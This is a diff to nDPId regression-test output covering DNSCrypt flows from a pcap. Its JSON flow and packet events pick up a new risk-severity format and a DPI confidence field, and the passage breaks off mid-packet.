 00973{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":946739660417,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"ts_msec":946739660417,"pkt":"ZmZmZmZmRERERERECABFAAGcN+1AADgRJ23DHl4cCgAAASD7n\/4BiHhncjZmbnZXajgMlZi7bjsjj63WxvRslmVw4ADDYw9Zf7rvWXePF7DzWlPhjWqgv8O9se2dHg\/hMkwpzbF\/IwWGmMmxEowkpKXdmkUibqvznKVpkcwGgbuuCaS7Y6VBAIjGo9kWj7NiKTrA6Y4suMJM1qQ00IXt9U3jt4cutk2V8vfwhRYcaNOhsYhZrStljarNU+tA0k9iIXbco1x+a3RzKSkOB\/31hiwlYARdPxVfA4tlw7PDeRv6xT+b+Zv+a+jVuxZiNAikFvbCic9wNteLeIi7n5SfaDU1hH5H0TBuxqIVG9IHOsQSrBqKpNMeo1qfha7yS2X+OJjDupJOcyA3aK4UBMnSr\/hwPHcnofH4+5e3N9vB71o19Y0N1Cu3OIZZTlMMscwt3XDJIpsNrPW0k\/KXOVig1xeZdDezEjIt7JmJY9nlO847+Hb404Ny9pRCt57zdrjCVnAEbkkF4phZwF7K\/zzTOwqW\/8CPNUPEe\/A1vTBCVo6HwXAA4OkIci3U"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":180000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"ts_msec":946739660417,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":180000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"ts_msec":946739660417,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739719617,"flow_last_seen":946739719617,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01229{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":946739719617,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739719617,"pkt":"REREREREZmZmZmZmCABFAAJc7JNAALYR9AUKAAABwx5eHOmkIPsCSORQeRS+sjS2G7nK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDBMo9soY0c0\/zLwoUlxND\/bzQvpDiK25XnQMxT75lxBrJflDrZ3TYKCZk3StXCyTPG2FEGcG4hxHWTOmqcbZoIHiQGoGkoQihxo2BUKPI0pv0p51t1V26edh28hXvxxPPw7SntT7cr75g96KEBOTmpz8vKr2JtKP2b7u7k2V1lEcb4dyw8IiZpBWjdyNCmd3NDqhxitoMAdVDWaaN+p4NUnsh5LOnpcy+BudMvUiIPxrci+i2KL44M4RFazBU2s57RNqiqEv2bkqUCThU0SgEc9wzNR0FW71ZK4hudAWH8M3\/hAXcN9AewD\/AaJXRVgDGL0qn\/KRenrwTdCnxi6HDTa7amK+XsctsA25HOCRbRxeQJwScz6KcVEdK2TbQ7TCqCmGiDFCvYDXyDQlbjKYXmp0\/BJYjaZCnwrJp12tBAZ0x6OjhYZwAWscu0uhjPmD9iVirzPedIzLRyxaMWlLGePyHaAj4Or7sxUvict7D7E89\/0BkN8XtgG7lgmFT7zBoSzurlQ88vZsCNnKrFOvXYxZt2fBsVODLujNj\/tDQxfHRhSVCSuXN1WgXvmx8\/4SpEwOdjJ8GjGun7mZ2UfbnIj9QtUtWtJKU6mASD9XU0UWic8hmr4RcPHxhUnHJGAJ046xlUlER7NkMJm1TYibdKqask11nfPMpD0VjWYxoY7AOCRP0FnM2aYF37QqRyAsLBiMZsWdVVPm"}
 01022{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":946739719664,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"ts_msec":946739719664,"pkt":"ZmZmZmZmRERERERECABFAAG+RWVAADgRGdPDHl4cCgAAASD76aQBqqggcjZmbnZXajgTKPbKGNHNP8y8KFKW+XSruqbViU5UWiUSva7p4q\/AYRczDRsV3nci5xVTY3W7NmNbgWd95Wn1LHJZkVPpqTVw1qBPY5mArBhf+gRPUeOFfECdd+ofJDaoGOvOFyamxhIyROMRMgW5dPvOthc+oP4fRsaTLVk1jsGJhVCC8lL5C7WuKe4QsVCug6vlUb5MDgOey6PWAfheq6uh\/Wb6o6xCo9SsCbwnrsE4\/c3AnoD6VGu4z3OHcZv3Of85CH1fdBZtiEXJ14iGDgR0ySBqfwkfNqV\/amN09mhv37d8Bukwbh0NRB9ju6Oyp6QVJsBxuvpcLx3ia\/I19JcfBxIdSgYP2PNeqmV9aFF\/5i5eq\/gB2ziWHE3n4eWmdHy\/5HtzZoouaDQrjeTLDoGeRsyQ8AbAcbxTJeYc\/hyvjG0S4Dh4GFFMLk5QGrpOAQxsjlasHPCZNUlI6FaWbg9J6wj4UctB1m9PxGlOpLCTcjHtKT14QtT3C0e8B5m0\/g4kyAvL0ntLRf8vwUxpdglUbwcHEqyLa0eWST5dVlmaKw=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":180000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":946739719664,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":180000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":946739719664,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739720236,"flow_last_seen":946739720236,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739720236,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01228{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":946739720236,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739720236,"pkt":"REREREREZmZmZmZmCABFAAJcgJBAALYRD\/QKAAABMw8+QbCyAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDOvN3LKmlsKPJgnxHDgQO2HIwu\/7HgUbhvSQLUmgTButtVYZ7ynSLJeOyVR7apKprNCXG1CB6RzKxjyoWSQdDjHQSudtBqe8pb0jpoyikDKAP5jZsuhlLmSafeiWgv4b7FcEcaSLItWNKLNEkAAXUwpoLIVbFjTOnXrLtfp8ddH5RkIQz3yuUJ9Nr9mnfMn04Kowojf10wKowiddPU5KKVho7F0cvcKjFtvuttnCHTnagcxAyTEmIcCymyhGi+h9M4qiKb4nZlaO8w0zOAMAC1r78IGbvmw2MC\/y\/XFDrOtYAyDWcOnUil1BFM0d\/Bz+j1o\/P8xdWxuA8zW6LX70nyKPAmn2+XMm6v93oH0oPPpEb87KAvDSvCagsZZA4fpWnggw8IDtM+xGjIpanNsL2VG3CCZ8SJchr0dd0ybGZUr6\/QWXs1PQNuAQq7PtTY0h5VDncSKKbfMtAy3KYwk5hwtNLo5PMwSgkhumRRE888qSzJlQJGBNzGsf1NwJANZTAqrVJeK8b7f+2pTSgrru+nRtvffr5TCeW5qGtpkkXT1G87oaz4FH2RV1Xm1JIdrzicLRjoj866viGnjQ5b2\/UKZWoCT22+fKnqSPDxIXp73HamN35GQ751GknwXsyMVZZbtLrbqcV6TqrFj8sSTjExCJ80Zk2kq4s9KvTe8IudfZv2VZnKat7igdMc61peD9CbEijjtfZYoC"}
 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":946739720266,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":946739720266,"pkt":"ZmZmZmZmRERERERECABFAAEM3XMAADURdWEzDz5BCgAAAQG7sLIA+HYgcjZmbnZXajjrzdyyppbCjyYJ8RwtW4RTIlvIG\/FZbH1Xp2LSeUte4yLE0KEYJIy\/W8+x\/FH3nQM381uStJPi54eYTbEiFOHb6+tNj6JfFejP8ANh9SW7+XztIQKHTMkKaKwDijmfQK3jWMvzYn5RQLy\/kgEd3jZcHSQ4+mGlJFAq0q9\/sxSmeRSE7Bf4lfghgGePrvRax2LVMOPyLQdEzOtXRcimFhC\/P2NV+z\/yC5UUyjWbNHflc5ZhEb6wjqEIWWaXMR9PmHFkJmX18vLk2mHCcaPJ0ISTpxtaV1D5IuKPIa2LIoH3gyFLk8kBlxy8"}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739720266,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739720266,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739725845,"flow_last_seen":946739725845,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739725845,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01230{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":946739725845,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739725845,"pkt":"REREREREZmZmZmZmCABFAAJcg7xAALYRDMgKAAABMw8+QY+KAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDHgMkBVee38D+I7fnhBktgHf7os968\/qL0XkoqwhIpo2rKPzGWXe2G9NgFMScZ1tv4\/+yOWKKWYUUiUyLx+7PMrENy\/k+jN+yzdctk2Zo3FLcHvC79XH2TY1F0O7cJD1wjxZI3\/IHMcd6PNvU2hGrzF+GquS0c6mjapr0bbntYIeD4+Xf\/ITOco5AtKhdlLVR6qs44J9FD4+1MhlzKeOoRa6oiskDhR9SKCiLE0vY6WaFISx1KvaV1\/AWlTq+Ma\/RCIZcpIwRnCK5x9qtU8svtd3XmYK5sxwzMlT8VpdCDkudem2VmnpOeldtwd4GZeCkcdGXhDpTvkco7\/J7KzU8Em3dvt1ZFDy4TcFUOFTvtGhCNRYamvuZtqV1ariMFQakPC5kVsCG2gSYSztnSwq2hbNURFeBG0BsgQjYyNkq5wGuYsXMV6s23vt0COGB4x1t6Zn8jjY5lWn7t84BUSUEjxNSXlazc9hfUsGYBk1YNyvKVIOa4XVjl\/NR0vRtizEXbk8CW7UFlpZywbOaEBbweblLU4zywJ5qKZiL8sEsu9XT1G3qBmTW8cVYrUgsGb+gfIiskkKUwoOtt9RL+Teq82rqtdl6NJyjfa8lJ6hpSkFQGXkbcjp3VueVgKLzTUvGcLRMTp0C18n\/FNAt4vg0zRX0o3Lss4rXcLQ3ZMQHCelaCESW7C4sZpRGMwGTOa2B2AzD+kO+ZGd"}
 00781{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":946739725874,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":946739725874,"pkt":"ZmZmZmZmRERERERECABFAAEM4eEAADURcPMzDz5BCgAAAQG7j4oA+L7VcjZmbnZXajh4DJAVXnt\/A\/iO355MVB4P\/\/Rk8\/R8bJwvIdLtYy13W15OTi+Go1C5ARLPQjyVOYrIdtt78KeJtxqvLGMYFgf90WzBjkKY8vjgNB0MPV1q9fSbDPwYJMt9sDZnnX7J06DitoJz19fiGevmNqdw2iS+W0+hbeSiK8kirJT\/QpPdxVHp2xD743rTjnXejSHner\/lxnNhKbPdOrwzbBbFmJ\/STzN7we3lc\/L7tRfFce0lf4Dadw+FNCaY6kAAQ713YJ6hg1mApwixRpXpT16U0DoxmV6YKXf9KevXwY7CFTGcq9MsTSP1FQYE"}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739725874,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739725874,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739727013,"flow_last_seen":946739727013,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739727013,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01226{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":946739727013,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739727013,"pkt":"REREREREZmZmZmZmCABFAAJchI5AALYRC\/YKAAABMw8+QYFBAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDAvLo+OTm36q6otOO+fGemzVvq0dD3jxm9VGAJSNGJ7CPJoGqXj8m9e0jdRInMcNRA9p4+0Ni8e31vogtljvbwYYgmhAZTxwGYs6C50cDQFt1uHfEvD15mlAq995eAVsOx9PzSthVaX\/ivHpOY6L3Ij\/Ef7SZJJCujYYFW73myi8HjWORk7BxBZfRqH+6sXHsTHW9JgIyfg81CrvoYmjj6eguA0dO39fTJaKjXzcpWKnEcMMNV4ml8LGnAy0T9PzW3di7md5aeCc6dVE4FKwEMVWCPhdhJoRf2eXkrqBw09LkEK01y9a7hl1hmtvIUWP7Fpi4bKoZT2dc0fFL1f9KzoS20B8JdI1HDtUFbfn9WkC6dXWkvGuh\/9+Rlymk6CKSLR0QVl5o+\/deX43CF3YmoxgH2snZah0gHUFwhHSA2MzyATzLiO4hwopOla7EXLAzrjJnmBpaFbHi1L+QqXQh2bLrcU+P9O4f9I6E21iw7CMaLWnshFHMR4k17Kr3eYvvp5nk3smnj6RkzbyXiwre7VxnxR8luWJiFKQAtgTS7iTP90QNwfWgaQbUtbBzkaFhJU0sLHhiOY7bVruAAJT6m3XAbRU\/eHVLtQFKfLcw5DBcGucce2S1ZsrhqHFcOTeV5s1bkuGYusFVrqTNERXk+qQd0EJRZ80ghllq3WCfjIbNz4NU54JpS6KXFVABPgeMm+